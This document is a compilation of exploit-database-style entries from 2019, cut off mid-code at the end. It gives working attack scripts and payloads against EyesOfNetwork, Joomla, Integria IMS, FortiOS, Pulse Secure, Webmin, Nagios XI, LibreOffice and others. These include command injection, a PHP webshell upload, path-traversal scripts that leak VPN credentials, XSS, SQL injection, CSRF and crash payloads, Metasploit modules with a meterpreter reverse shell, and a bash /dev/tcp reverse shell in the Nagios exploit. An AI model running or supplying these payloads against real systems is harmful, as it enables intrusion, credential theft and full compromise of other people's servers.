# Exploit Title: EyesOfNetwork 5.1 - Authenticated Remote Command Execution # Google Dork: N/A # Date: 2019-08-14 # Exploit Author: Nassim Asrir # Vendor Homepage: https://www.eyesofnetwork.com/ # Software Link: https://www.eyesofnetwork.com/?page_id=48&lang=fr # Version: 5.1 < 5.0 # Tested on: Windows 10 # CVE : N/A #About The Product: ''' EyesOfNetwork ("EON") is the OpenSource solution combining a pragmatic usage of ITIL processes and a technological interface allowing their workaday application. EyesOfNetwork Supervision is the first brick of a range of products targeting to assist IT managment and gouvernance. EyesOfNetwork Supervision provides event management, availability, problems and capacity. #Technical Analysis: EyesOfNetwork allows Remote Command Execution via shell metacharacters in the module/tool_all/ host field. By looking into tools/snmpwalk.php we will find the vulnerable part of code: else{ $command = "snmpwalk -c $snmp_community -v $snmp_version $host_name"; } in this line we can see as the attacker who control the value of "$host_name" variable . And after that we have the magic function "popen" in the next part of code. $handle = popen($command,'r'); echo "<p>";<br /> while($read = fread($handle,100)){ echo nl2br($read); flush(); } pclose($handle); And now we can see the use of "popen" function that execute the $command's value and if we set a shell metacharacters ";" in the end of the command we will be able to execute OS command.''' #Exploit import requests import optparse import sys import bs4 as bs commandList = optparse.OptionParser('usage: %prog -t https://target:443 -u admin -p pwd -c "ls"') commandList.add_option('-t', '--target', action="store", help="Insert TARGET URL", ) commandList.add_option('-c', '--cmd', action="store", help="Insert command name", ) commandList.add_option('-u', '--user', action="store", help="Insert username", ) commandList.add_option('-p', '--pwd', action="store", help="Insert password", ) options, remainder = commandList.parse_args() if not options.target or not options.cmd or not options.user or not options.pwd: commandList.print_help() sys.exit(1) url = options.target cmd = options.cmd user = options.user pwd = options.pwd with requests.session() as c: link=url initial=c.get(link) login_data={"login":user,"mdp":pwd} page_login=c.post(str(link)+"/login.php", data=login_data) v_url=link+"/module/tool_all/select_tool.php" v_data = {"page": "bylistbox", "host_list": "127.0.0.1;"+cmd, "tool_list": "tools/snmpwalk.php", "snmp_com": "mm", "snmp_version": "2c", "min_port": "1", "max_port": "1024", "username": '', "password": '', "snmp_auth_protocol": "MD5", "snmp_priv_passphrase": '', "snmp_priv_protocol": '', "snmp_context": ''} page_v=c.post(v_url, data=v_data) my=bs.BeautifulSoup(page_v.content, "lxml") for textarea in my.find_all('p'): final = textarea.get_text() print final

# Exploit Title: Joomla! component com_jsjobs 1.2.6 - Arbitrary File Deletion # Dork: inurl:"index.php?option=com_jsjobs" # Date: 2019-08-16 # Exploit Author: qw3rTyTy # Vendor Homepage: https://www.joomsky.com/ # Software Link: https://www.joomsky.com/5/download/1 # Version: 1.2.6 # Tested on: Debian/nginx/joomla 3.9.0 # Vulnerability details: # This vulnerability is caused when processing custom userfield. File: site/models/job.php Function: storeJob Line: 1240 ------------------------------------- 1215 //custom field code start 1216 $customflagforadd = false; 1217 $customflagfordelete = false; 1218 $custom_field_namesforadd = array(); 1219 $custom_field_namesfordelete = array(); 1220 $userfield = $this->getJSModel('customfields')->getUserfieldsfor(2); 1221 $params = array(); 1222 $forfordelete = ''; 1223 1224 foreach ($userfield AS $ufobj) { 1225 $vardata = ''; 1226 if($ufobj->userfieldtype == 'file'){ 1227 if(isset($data[$ufobj->field.'_1']) && $data[$ufobj->field.'_1'] == 0){ 1228 $vardata = $data[$ufobj->field.'_2']; 1229 }else{ 1230 $vardata = $_FILES[$ufobj->field]['name']; 1231 } 1232 $customflagforadd=true; 1233 $custom_field_namesforadd[]=$ufobj->field; 1234 }else{ 1235 $vardata = isset($data[$ufobj->field]) ? $data[$ufobj->field] : ''; 1236 } 1237 if(isset($data[$ufobj->field.'_1']) && $data[$ufobj->field.'_1'] == 1){ 1238 $customflagfordelete = true; 1239 $forfordelete = $ufobj->field; 1240 $custom_field_namesfordelete[]= $data[$ufobj->field.'_2']; //No check. 1241 } ...snip... 1323 // new 1324 //removing custom field 1325 if($customflagfordelete == true){ 1326 foreach ($custom_field_namesfordelete as $key) { 1327 $res = $this->getJSModel('common')->uploadOrDeleteFileCustom($row->id,$key ,1,2); //!!! 1328 } 1329 } File: site/models/common.php Function: uploadOrDeleteFileCustom Line: 851 ------------------------------------- 748 $path = $base . '/' . $datadirectory; 749 if (!file_exists($path)) { // create user directory 750 $this->makeDir($path); 751 } 752 $isupload = false; 753 $path = $path . '/data'; 754 if (!file_exists($path)) { // create user directory 755 $this->makeDir($path); 756 } 757 if($for == 3 ) 758 $path = $path . '/jobseeker'; 759 else 760 $path = $path . '/employer'; 761 762 if (!file_exists($path)) { // create user directory 763 $this->makeDir($path); 764 } ...snip... 843 } else { // DELETE FILES 844 if ($isdeletefile == 1) { 845 if($for == 3){ 846 $userpath = $path . '/'.$datafor.'_' . $resumeid . '/customfiles/'; 847 }else{ 848 $userpath = $path . '/'.$datafor.'_' . $id . '/customfiles/'; 849 } 850 $file = $userpath.$field; 851 unlink($file); //!!! 852 } 853 return 1; 854 } 855 } ##################################### #PoC: ##################################### # If an administrator has added custom userfield 'ufield926' as field type 'file', attacker are can trigger this vulnerability by send a following requests. $> curl -X POST -i -H 'Cookie: VALID_SESSION_ID=VALID_SESSION_ID' -F 'options=com_jsjobs' -F 'task=job.savejob' -F 'id=' -F 'enforcestoppublishjob=666' -F 'startpublishing=2019-08-16' -F 'stoppublishing=2019-08-16' -F 'description=woot' -F 'title=woot' -F 'ufield926=@./valid_image.jpg' -F 'VALID_FORM_TOKEN_FROM_FORMJOB=1' "http://localhost/index.php" $> curl -X POST -i -H 'Cookie: VALID_SESSION_ID=VALID_SESSION_ID' -F 'options=com_jsjobs' -F 'task=job.savejob' -F 'id=666' -F 'enforcestoppublishjob=666' -F 'startpublishing=2019-08-16' -F 'stoppublishing=2019-08-16' -F 'description=woot' -F 'title=woot' -F 'ufield926_1=1' -F 'ufield926_2=../../../../../configuration.php' -F 'VALID_FORM_TOKEN_FROM_FORMJOB=1' "http://localhost/index.php"

# Exploit Title: Integria IMS 5.0.86 - Arbitrary File Upload # Date: 2019-08-16 # Exploit Author: Greg.Priest # Vendor Homepage: https://integriaims.com/ # Software Link: https://sourceforge.net/projects/integria/files/5.0.86/ # Version: Integria IMS 5.0.86 # Tested on: Windows # CVE : N/A # --------------------------------------------------------------------------------------- # http://10.61.184.30/integria//index.php?sec=wiki&sec2=operation/wiki/wiki&action=upload # --------------------------------------------------------------------------------------- # [Description] # filemgr.php in Integria IMS 5.0.86, allows arbitrary file upload. # index.php?sec=wiki&sec2=operation/wiki/wiki&action=upload # --------------------------------------------------------------------------------------- POST /integria/index.php?sec=wiki&sec2=operation/wiki/wiki&action=upload HTTP/1.1 Host: 10.61.184.30 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: hu-HU,hu;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://10.61.184.30/integria/index.php?sec=wiki&sec2=operation/wiki/wiki&action=upload Content-Type: multipart/form-data; boundary=---------------------------30333176734664 Content-Length: 374 Connection: close Cookie: PHPSESSID=1d31d410e9b85f1e9aaa53a2616a550e Upgrade-Insecure-Requests: 1 -----------------------------30333176734664 Content-Disposition: form-data; name="curdir" -----------------------------30333176734664 Content-Disposition: form-data; name="file"; filename="whoami.php" Content-Type: application/octet-stream <?php $output = shell_exec('whoami'); echo "<pre>$output</pre>"; ?> -----------------------------30333176734664--

# Exploit Title : GetGo Download Manager 6.2.2.3300 - Denial of Service # Date: 2019-08-15 # Author - Malav Vyas # Vulnerable Software: GetGo Download Manager 6.2.2.3300 # Vendor Home Page: www.getgosoft.com # Software Link: http://www.getgosoft.com/getgodm/ # Tested On: Windows 7 (64Bit), Windows 10 (64Bit) # Attack Type : Remote # Impact : DoS # Co-author - Velayuthm Selvaraj # 1. Description # A buffer overflow vulnerability in GetGo Download Manager 6.2.2.3300 and # earlier could allow Remote NAS HTTP servers to perfor DOS via a long response. # 2. Proof of Concept import socket from time import sleep host = "192.168.0.112" port = 80 sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.bind((host, port)) sock.listen(1) print "\n[+] Listening on %d ..." % port cl, addr = sock.accept() print "[+] Connected to %s" % addr[0] evilbuffer = "A" * 6000 buffer = "HTTP/1.1 200 " + evilbuffer + "\r\n" print cl.recv(1000) cl.send(buffer) print "[+] Sending buffer: OK\n" sleep(30) cl.close() sock.close()

# Exploit Title: Web Wiz Forums 12.01 - 'PF' SQL Injection # Date: 2019-09-16 # Exploit Author: n1x_ [MS-WEB] # Vendor Homepage: https://www.webwiz.net/web-wiz-forums/forum-downloads.htm # Version: 12.01 # Tested on Windows # Vulnerable parameter: PF (member_profile.asp) # GET Request GET /member_profile.asp?PF=10' HTTP/1.1 Host: host User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: wwf10lVisit=LV=2019%2D08%2D16+14%3A55%3A50; wwf10sID=SID=1784%2Da7facz6e8757e8ae7b746221064815; ASPSESSIONIDQACRQTCC=OKJNGKBDFFNFKFDJMFIFPBLD Connection: close Upgrade-Insecure-Requests: 1

# Exploit Title: RAR Password Recovery v1.80 Denial of Service Exploit # Date: 16.08.2019 # Vendor Homepage:https://www.top-password.com/ # Software Link: https://www.top-password.com/download/RARPRSetup.exe # Exploit Author: Achilles # Tested Version: v1.80 # Tested on: Windows 7 x64 # Windows XP SP3 # 1.- Run python code :RAR Password Recovery.py # 2.- Open EVIL.txt and copy content to clipboard # 3.- Open RAR Password Recovery and Click 'Register' # 4.- Paste the content of EVIL.txt into the Field: 'User Name and Registration Code' # 5.- Click 'OK' and you will see a crash. #!/usr/bin/env python buffer = "\x41" * 6000 try: f=open("Evil.txt","w") print "[+] Creating %s bytes evil payload.." %len(buffer) f.write(buffer) f.close() print "[+] File created!" except: print "File cannot be created"

# Exploit Title: Kimai 2- persistent cross-site scripting (XSS) # Date: 07/15/2019 # Exploit Author: osamaalaa # Vendor Homepage: [link] # Software Link: https://github.com/kevinpapst/kimai2 # Fixed on Github : https://github.com/kevinpapst/kimai2/pull/962 # Version: 2 1-Normal user will try to add timesheet from this link http://localhost/index.php/en/timesheet/create 2-Add this payload "><svg/onload=alert('xss')> in the description 3-Save The changes 4-refresh and we have alert pop up! The Request POC : POST /index.php/en/timesheet/create HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 392 Connection: close Referer: http://localhost Cookie: PHPSESSID=auehoprhqk3qspncs5s08ucobv timesheet_edit_form[begin]=2019-08-17 13:02&timesheet_edit_form[end]=2019-08-18 00:00&timesheet_edit_form[customer]=12&timesheet_edit_form[project]=24&timesheet_edit_form[activity]=27&timesheet_edit_form[description]= "><svg/onload=alert('xss')>&timesheet_edit_form[tags]=&timesheet_edit_form[_token]=19Owg2YgIMPFUcEP9NVibhqEpKwkwhVt5j-BTJysyK0

# Exploit Title: Fortinet FortiOS Leak file - Reading login/passwords in clear text. # Google Dork: intext:"Please Login" inurl:"/remote/login" # Date: 17/08/2019 # Exploit Author: Carlos E. Vieira # Vendor Homepage: https://www.fortinet.com/ # Software Link: https://www.fortinet.com/products/fortigate/fortios.html # Version: This vulnerability affect ( FortiOS 5.6.3 to 5.6.7 and FortiOS 6.0.0 to 6.0.4 ). # Tested on: 5.6.6 # CVE : CVE-2018-13379 require 'msf/core' class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Post::File def initialize(info = {}) super(update_info(info, 'Name' => 'SSL VPN FortiOs - System file leak', 'Description' => %q{ FortiOS system file leak through SSL VPN via specially crafted HTTP resource requests. This exploit read /dev/cmdb/sslvpn_websession file, this file contains login and passwords in (clear/text). This vulnerability affect ( FortiOS 5.6.3 to 5.6.7 and FortiOS 6.0.0 to 6.0.4 ). }, 'References' => [ [ 'URL', 'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13379' ] ], 'Author' => [ 'lynx (Carlos Vieira)' ], 'License' => MSF_LICENSE, 'DefaultOptions' => { 'RPORT' => 443, 'SSL' => true }, )) end def run() print_good("Checking target...") res = send_request_raw({'uri'=>'/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession'}) if res && res.code == 200 print_good("Target is Vulnerable!") data = res.body current_host = datastore['RHOST'] filename = "msf_sslwebsession_"+current_host+".bin" File.delete(filename) if File.exist?(filename) file_local_write(filename, data) print_good("Parsing binary file.......") parse() else if(res && res.code == 404) print_error("Target not Vulnerable") else print_error("Ow crap, try again...") end end end def parse() current_host = datastore['RHOST'] fileObj = File.new("msf_sslwebsession_"+current_host+".bin", "r") words = 0 while (line = fileObj.gets) printable_data = line.gsub(/[^[:print:]]/, '.') array_data = printable_data.scan(/.{1,60}/m) for ar in array_data if ar != "............................................................" print_good(ar) end end #print_good(printable_data) end fileObj.close end end

# Exploit Title: Fortinet FortiOS Leak file - Reading login/passwords in clear text. # Google Dork: intext:"Please Login" inurl:"/remote/login" # Date: 17/08/2019 # Exploit Author: Carlos E. Vieira # Vendor Homepage: https://www.fortinet.com/ # Software Link: https://www.fortinet.com/products/fortigate/fortios.html # Version: This vulnerability affect ( FortiOS 5.6.3 to 5.6.7 and FortiOS 6.0.0 to 6.0.4 ). # Tested on: 5.6.6 # CVE : CVE-2018-13379 # Exploit SSLVPN Fortinet - FortiOs #!/usr/bin/env python import requests, sys, time import urllib3 urllib3.disable_warnings() def leak(host, port): print("[!] Leak information...") try: url = "https://"+host+":"+port+"/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession" headers = {"User-Agent": "Mozilla/5.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1"} r=requests.get(url, headers=headers, verify=False, stream=True) img=r.raw.read() if "var fgt_lang =" in str(img): with open("sslvpn_websession_"+host+".dat", 'w') as f: f.write(img) print("[>] Save to file ....") parse(host) print("\n") return True else: return False except requests.exceptions.ConnectionError: return False def is_character_printable(s): return all((ord(c) < 127) and (ord(c) >= 32) for c in s) def is_printable(byte): if is_character_printable(byte): return byte else: return '.' def read_bytes(host, chunksize=8192): print("[>] Read bytes from > " + "sslvpn_websession"+host+".dat") with open("sslvpn_websession_"+host+".dat", "rb") as f: while True: chunk = f.read(chunksize) if chunk: for b in chunk: yield b else: break def parse(host): print("[!] Parsing Information...") memory_address = 0 ascii_string = "" for byte in read_bytes(host): ascii_string = ascii_string + is_printable(byte) if memory_address%61 == 60: if ascii_string!=".............................................................": print ascii_string ascii_string = "" memory_address = memory_address + 1 def check(host, port): print("[!] Check vuln...") uri = "/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession" try: r = requests.get("https://" + host + ":" + port + uri, verify=False) if(r.status_code == 200): return True elif(r.status_code == 404): return False else: return False except: return False def main(host, port): print("[+] Start exploiting....") vuln = check(host, port) if(vuln): print("[+] Target is vulnerable!") bin_file = leak(host, port) else: print("[X] Target not vulnerable.") if __name__ == "__main__": if(len(sys.argv) < 3): print("Use: python {} ip/dns port".format(sys.argv[0])) else: host = sys.argv[1] port = sys.argv[2] main(host, port)

# Exploit Title: Neo Billing 3.5 - Stored Cross Site Scripting Vulnerability # Date: 18.8.2019. # Exploit Author: n1x_ [MS-WEB] # Vendor Homepage: https://codecanyon.net/item/neo-billing-accounting-invoicing-and-crm-software/20896547 # Version: 3.5 # CWE : CWE-79 # CVE: CVE-2020-23518 [Description] # Neo Billing os an accounting, invoicing and CRM PHP script, with over 500 installations. # Due to improper input fields data filtering, version 3.5 (and possibly previous versions), are affected by a stored XSS vulnerability. [Proof of Concept] # 1. Authorization as customer (regular user account) [//host/neo/crm/user/login] # 2. Closing an input field tag and injecting code into 'Subject' or 'Description' text fields [//host/neo/crm/tickets/addticket] # 3. The code is stored [//host/neo/crm/tickets] ∨ [//host/neo/crm/tickets/thread/?id=ticketid] [Example paylods] # Example payload: "><img src="x" onerror="alert('XSS');"> # Example payload: "><script>alert(document.cookie)</script> [POST Request] POST /neo/crm/tickets/addticket HTTP/1.1 Host: host User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: //host/neo/crm/tickets/addticket Content-Type: multipart/form-data; boundary=---------------------------899768029113033755249127523 Content-Length: 694 Cookie: __cfduid=d99e93624fe63d5aa953bf59cd28cdafe1566123585; ci_sessions=nel35vfb2hi5f9tt29l43ogn36hdmilj Connection: close Upgrade-Insecure-Requests: 1 -----------------------------899768029113033755249127523 Content-Disposition: form-data; name="title" "><script>alert('XSS')</script> -----------------------------899768029113033755249127523 Content-Disposition: form-data; name="content" <p>"><script>alert('XSS')</script><br></p> -----------------------------899768029113033755249127523 Content-Disposition: form-data; name="files"; filename="" Content-Type: application/octet-stream -----------------------------899768029113033755249127523 Content-Disposition: form-data; name="userfile"; filename="" Content-Type: application/octet-stream -----------------------------899768029113033755249127523--

#!/bin/sh # # CVE-2019-15107 Webmin Unauhenticated Remote Command Execution # based on Metasploit module https://www.exploit-db.com/exploits/47230 # Original advisory: https://pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html # Alternative advisory (spanish): https://blog.nivel4.com/noticias/vulnerabilidad-de-ejecucion-de-comandos-remotos-en-webmin # # Fernando A. Lagos B. (Zerial) # https://blog.zerial.org # https://blog.nivel4.com # # The script sends a flag by a echo command then grep it. If match, target is vulnerable. # # Usage: sh CVE-2019-15107.sh https://target:port # Example: sh CVE-2019-15107.sh https://localhost:10000 # output: Testing for RCE (CVE-2019-15107) on https://localhost:10000: VULNERABLE! # FLAG="f3a0c13c3765137bcde68572707ae5c0" URI=$1; echo -n "Testing for RCE (CVE-2019-15107) on $URI: "; curl -ks $URI'/password_change.cgi' -d 'user=wheel&pam=&expired=2&old=id|echo '$FLAG'&new1=wheel&new2=wheel' -H 'Cookie: redirect=1; testing=1; sid=x; sessiontest=1;' -H "Content-Type: application/x-www-form-urlencoded" -H 'Referer: '$URI'/session_login.cgi'|grep $FLAG>/dev/null 2>&1 if [ $? -eq 0 ]; then echo '\033[0;31mVULNERABLE!\033[0m' else echo '\033[0;32mOK! (target is not vulnerable)\033[0m' fi #EOF

# Exploit Title: YouPHPTube < 7.3 SQL Injection # Google Dork: / # Date: 19.08.2019 # Exploit Author: Fabian Mosch, r-tec IT Security GmbH # Vendor Homepage: https://www.youphptube.com/ # Software Link: https://github.com/YouPHPTube/YouPHPTube # Version: < 7.3 # Tested on: Linux/Windows # CVE : CVE-2019-14430 The parameters "User" as well as "pass" of the user registration function are vulnerable to SQL injection vulnerabilities. By submitting an HTTP POST request to the URL "/objects/userCreate.json.php" an attacker can access the database and read the hashed credentials of an administrator for example. Example Request: POST /objects/userCreate.json.php HTTP/1.1 Host: vulnerablehost.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: */* Accept-Language: de,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate [SomeHeaders and Cookies] user=tes'INJECTHERE&pass=test'INJECTHERE &email=test%40example.com&name=test&captcha=xxxxx Methods for DB-Extraction are: - Boolean-based blind - Error-based - AND/OR time-based blind The vulnerability was fixed with this commit: https://github.com/YouPHPTube/YouPHPTube/commit/891843d547f7db5639925a67b7f2fd66721f703a

# Exploit Title: CSRF vulnerabilities in WP Add Mime Types Plugin <= 2.2.1 # Google Dork: inurl:”/wp-content/plugins/wp-add-mime-types” # Date: 18 july, 2019 # Exploit Author: Princy Edward # Exploit Author Blog : https://prinyedward.blogspot.com/ # Vendor Homepage: https://wordpress.org/plugins/wp-add-mime-types/ # Software Link: https://downloads.wordpress.org/plugin/wp-add-mime-types.2.2.1.zip # Version: 2.2.1 # Tested on: Apache/2.2.24 (CentOS) # CVE : Fresh #About Plugin The plugin additionally allows the mime types and file extensions to WordPress. In other words, your WordPress site can upload various file extensions. #Vulnerable Description WordPress plugin WP Add Mime Types plugin 2.2.1 vulnerable to CWE-352. ## CSRF Code Share this malicious link to the plugin user. Once he clicks the link, the mime type will automatically get updated. Here I shared a POC to allow exe files(application/x-msdownload) to be uploaded. <html> <body onload="document.forms[0].submit()"> <form method="POST" action="http://IP/wp-admin/options-general.php?page=wp-add-mime-types%2Fincludes%2Fadmin.php"> <input type="hidden" name="mime_type_values" value="exe = application/x-msdownload"> <input type="submit"> </form> </body> </html>

# Exploit Title: File disclosure in Pulse Secure SSL VPN (metasploit) # Google Dork: inurl:/dana-na/ filetype:cgi # Date: 8/20/2019 # Exploit Author: 0xDezzy (Justin Wagner), Alyssa Herrera # Vendor Homepage: https://pulsesecure.net # Version: 8.1R15.1, 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4 # Tested on: Linux # CVE : CVE-2019-11510 require 'msf/core' class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Post::File def initialize(info = {}) super(update_info(info, 'Name' => 'Pulse Secure - System file leak', 'Description' => %q{ Pulse Secure SSL VPN file disclosure via specially crafted HTTP resource requests. This exploit reads /etc/passwd as a proof of concept This vulnerability affect ( 8.1R15.1, 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4 }, 'References' => [ [ 'URL', 'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11510' ] ], 'Author' => [ '0xDezzy (Justin Wagner), Alyssa Herrera' ], 'License' => MSF_LICENSE, 'DefaultOptions' => { 'RPORT' => 443, 'SSL' => true }, )) end def run() print_good("Checking target...") res = send_request_raw({'uri'=>'/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/'},1342) if res && res.code == 200 print_good("Target is Vulnerable!") data = res.body current_host = datastore['RHOST'] filename = "msf_sslwebsession_"+current_host+".bin" File.delete(filename) if File.exist?(filename) file_local_write(filename, data) print_good("Parsing file.......") parse() else if(res && res.code == 404) print_error("Target not Vulnerable") else print_error("Ooof, try again...") end end end def parse() current_host = datastore['RHOST'] fileObj = File.new("msf_sslwebsession_"+current_host+".bin", "r") words = 0 while (line = fileObj.gets) printable_data = line.gsub(/[^[:print:]]/, '.') array_data = printable_data.scan(/.{1,60}/m) for ar in array_data if ar != "............................................................" print_good(ar) end end #print_good(printable_data) end fileObj.close end end

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT def initialize(info = {}) super(update_info(info, 'Name' => 'LibreOffice Macro Python Code Execution', 'Description' => %q{ LibreOffice comes bundled with sample macros written in Python and allows the ability to bind program events to them. LibreLogo is a macro that allows a program event to execute text as Python code, allowing RCE. This module generates an ODT file with a dom loaded event that, when triggered, will execute arbitrary python code and the metasploit payload. }, 'License' => MSF_LICENSE, 'Author' => [ 'Nils Emmerich', # Vulnerability discovery and PoC 'Shelby Pace', # Base module author (CVE-2018-16858), module reviewer and platform-independent code 'LoadLow', # This msf module 'Gabriel Masei' # Global events vuln. disclosure ], 'References' => [ [ 'CVE', '2019-9851' ], [ 'URL', 'https://www.libreoffice.org/about-us/security/advisories/cve-2019-9848/' ], [ 'URL', 'https://www.libreoffice.org/about-us/security/advisories/cve-2019-9851/' ], [ 'URL', 'https://insinuator.net/2019/07/libreoffice-a-python-interpreter-code-execution-vulnerability-cve-2019-9848/' ] ], 'DisclosureDate' => '2019-07-16', 'Platform' => 'python', 'Arch' => ARCH_PYTHON, 'DefaultOptions' => { 'Payload' => 'python/meterpreter/reverse_tcp' }, 'Targets' => [ ['Automatic', {}] ], 'DefaultTarget' => 0 )) register_options( [ OptString.new('FILENAME', [true, 'Output file name', 'librefile.odt']), OptString.new('TEXT_CONTENT', [true, 'Text written in the document. It will be html encoded.', 'My Report']), ]) end def gen_file text_content = Rex::Text.html_encode(datastore['TEXT_CONTENT']) py_code = Rex::Text.encode_base64(payload.encoded) @cmd = "exec(eval(str(__import__('base64').b64decode('#{py_code}'))))" @cmd = Rex::Text.html_encode(@cmd) fodt_file = File.read(File.join(Msf::Config.data_directory, 'exploits', 'CVE-2019-9848', 'librefile.erb')) libre_file = ERB.new(fodt_file).result(binding()) print_status("File generated! Now you need to move the odt file and find a way to send it/open it with LibreOffice on the target.") libre_file rescue Errno::ENOENT fail_with(Failure::NotFound, 'Cannot find template file') end def exploit fodt_file = gen_file file_create(fodt_file) end end

<?php /* A vulnerability exists in Nagios XI <= 5.6.5 allowing an attacker to leverage an RCE to escalate privileges to root. The exploit requires access to the server as the 'nagios' user, or CCM access via the web interface with perissions to manage plugins. The getprofile.sh script, invoked by downloading a system profile (profile.php?cmd=download), is executed as root via a passwordless sudo entry; the script executes the ‘check_plugin’ executuable which is owned by the nagios user A user logged into Nagios XI with permissions to modify plugins, or the 'nagios' user on the server,can modify the ‘check_plugin’ executable and insert malicious commands exectuable as root. Author: Jak Gibb (https://github.com/jakgibb/nagiosxi-root-exploit) Date discovered: 28th July 2019 Reported to Nagios: 29th July 2019 Confirmed by Nagios: 29th July 2019 */ $userVal = parseArgs($argv); checkCookie(); $userVal['loginNSP'] = extractNSP($userVal['loginUrl']); authenticate($userVal); $userVal['pluginNSP'] = extractNSP($userVal['pluginUrl']); uploadPayload($userVal); triggerPayload($userVal); function extractNSP($url) { $curl = curl_init(); curl_setopt($curl, CURLOPT_URL, $url); curl_setopt($curl, CURLOPT_RETURNTRANSFER, TRUE);; curl_setopt($curl, CURLOPT_COOKIEJAR, 'cookie.txt'); curl_setopt($curl, CURLOPT_COOKIEFILE, 'cookie.txt'); curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, FALSE); curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, FALSE); echo "[+] Grabbing NSP from: {$url}\n"; $response = curl_exec($curl); $httpCode = curl_getinfo($curl, CURLINFO_HTTP_CODE); if ($httpCode == '200') { echo "[+] Retrieved page contents from: {$url}\n"; } else { echo "[+] Unable to open page: {$url} to obtain NSP\n"; exit(1); } $DOM = new DOMDocument(); @$DOM->loadHTML($response); $xpath = new DOMXpath($DOM); $input = $xpath->query('//input[@name="nsp"]'); $nsp = $input->item(0)->getAttribute('value'); if (isset($nsp)) { echo "[+] Extracted NSP - value: {$nsp}\n"; } else { echo "[+] Unable to obtain NSP from {$url}\n"; exit(1); } return $nsp; } function authenticate($userVal) { $postValues = array( 'username' => $userVal['user'], 'password' => $userVal['pass'], 'pageopt' => 'login', 'nsp' => $userVal['loginNSP'] ); $curl = curl_init(); curl_setopt($curl, CURLOPT_URL, $userVal['loginUrl']); curl_setopt($curl, CURLOPT_POST, TRUE); curl_setopt($curl, CURLOPT_POSTFIELDS, http_build_query($postValues)); curl_setopt($curl, CURLOPT_REFERER, $userVal['loginUrl']); curl_setopt($curl, CURLOPT_RETURNTRANSFER, TRUE); curl_setopt($curl, CURLOPT_COOKIEJAR, 'cookie.txt'); curl_setopt($curl, CURLOPT_COOKIEFILE, 'cookie.txt'); curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, FALSE); curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, FALSE); echo "[+] Attempting to login...\n"; curl_exec($curl); if (curl_getinfo($curl, CURLINFO_HTTP_CODE) == '302') { echo "[+] Authentication success\n"; } else { echo "[+] Unable to plguin, check your credentials\n"; exit(1); } echo "[+] Checking we have admin rights...\n"; curl_setopt($curl, CURLOPT_URL, $userVal['pluginUrl']); $response = curl_exec($curl); $title = NULL; $dom = new DOMDocument(); if (@$dom->loadHTML($response)) { $dom->getElementsByTagName("title")->length > 0 ? $title = $dom->getElementsByTagName("title")->item(0)->textContent : FALSE; } if (strpos($title, 'Manage') !== FALSE) { echo "[+] Admin access confirmed\n"; } else { echo "[+] Unable to reach login page, are you admin?\n"; exit(1); } } function uploadPayload($userVal) { $payload = "-----------------------------18467633426500\nContent-Disposition: form-data; name=\"upload\"\n\n1\n-----------------------------18467633426500\nContent-Disposition: form-data; name=\"nsp\"\n\n{$userVal['pluginNSP']}\n-----------------------------18467633426500\nContent-Disposition: form-data; name=\"MAX_FILE_SIZE\"\n\n20000000\n-----------------------------18467633426500\nContent-Disposition: form-data; name=\"uploadedfile\"; filename=\"check_ping\"\nContent-Type: text/plain\n\nbash -i >& /dev/tcp/{$userVal['reverseip']}/{$userVal['reverseport']} 0>&1\n-----------------------------18467633426500--\n"; $curl = curl_init(); curl_setopt($curl, CURLOPT_URL, $userVal['pluginUrl']); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); curl_setopt($curl, CURLOPT_POSTFIELDS, $payload); curl_setopt($curl, CURLOPT_POST, 1); curl_setopt($curl, CURLOPT_ENCODING, 'gzip, deflate'); curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, FALSE); curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($curl, CURLOPT_COOKIEFILE, 'cookie.txt'); $headers = array(); $headers[] = 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'; $headers[] = 